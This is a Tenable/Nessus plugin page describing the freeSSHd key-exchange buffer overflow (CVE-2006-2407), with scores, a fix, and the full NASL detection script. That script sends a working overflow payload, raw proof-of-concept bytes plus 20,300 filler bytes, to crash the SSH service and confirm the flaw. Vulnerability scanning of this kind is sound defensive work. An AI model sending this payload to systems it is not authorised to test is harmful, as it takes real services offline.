freeSSHd Key Exchange Algorithm String Remote Overflow

2006-05-2200:00:00

www.tenable.com

7.5 High

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.595 Medium

EPSS

Percentile

97.8%

JSON

The remote host is using freeSSHd, a free SSH server for Windows.

The version of freeSSHd installed on the remote host does not validate the key exchange strings sent by a SSH client. This can result in a buffer overflow and possibly a compromise of the host if an unauthenticated attacker sends a long key exchange string.

#
# Script Written By Ferdy Riphagen
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#

# Changes by Tenable:
# - Revised plugin title, moved see also to xref, family change (8/14/09)


include("compat.inc");

if (description) {
 script_id(21580);
 script_version("1.19");
 script_cvs_date("Date: 2018/08/22 16:49:14");

 script_cve_id("CVE-2006-2407");
 script_bugtraq_id(17958);
 script_xref(name:"Secunia", value:"19846");

 script_name(english:"freeSSHd Key Exchange Algorithm String Remote Overflow");

 script_set_attribute(attribute:"synopsis", value:
"The remote SSH server is prone to a buffer overflow attack." );
 script_set_attribute(attribute:"description", value:
"The remote host is using freeSSHd, a free SSH server for Windows. 

The version of freeSSHd installed on the remote host does not validate
the key exchange strings sent by a SSH client.  This can result in a
buffer overflow and possibly a compromise of the host if an
unauthenticated attacker sends a long key exchange string." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to FreeSSHd version 1.0.10 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2006/05/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/05/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"Checks for a buffer overflow in freeSSHd");
 script_category(ACT_DENIAL);
 script_family(english:"Gain a shell remotely");
 script_copyright(english:"This script is Copyright (C) 2006-2018 Ferdy Riphagen");
 script_dependencies("find_service1.nasl");
 script_require_ports("Services/ssh", 22);
 exit(0);
}


include("global_settings.inc");
include("misc_func.inc");

if (report_paranoia < 1) exit(0, "This script is prone to false positive.");

port = get_service(svc:"ssh", default: 22, exit_on_fail: 1);

soc = open_sock_tcp(port);
if (!soc) exit(1, "Cannot connect to TCP port "+port+".");

banner = recv(socket:soc, length:128);
# nb: sample banner from freeSSHd 1.0.10:
#       SSH-2.0-WeOnlyDo 1.2.7
if (! egrep(pattern:"SSH.+WeOnlyDo", string:banner))
{
  close(soc);
  exit(0, "The SSH server on port "+port+" is not freeSSHD.");
}
 
 ident = "SSH-2.0-OpenSSH_4.2p1";
 exp = ident + raw_string(   # Used from the original POC. 
		0x0a, 0x00, 0x00, 0x4f, 0x04, 0x05, 
		0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
		0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xde) 
		+ crap(length:20300);

 send(socket:soc, data:exp);
 recv(socket:soc, length:1024);
 close(soc);

 soc = open_sock_tcp(port);
 if (! soc)
 {
   if (service_is_dead(port: port) <= 0)	# Alive or timeout
     exit(1, "Could not reconnect to port "+port+".");
   security_hole(port);
   exit(0);
 }
recv = recv(socket:soc, length:128);
close (soc);
if (! strlen(recv)) security_hole(port);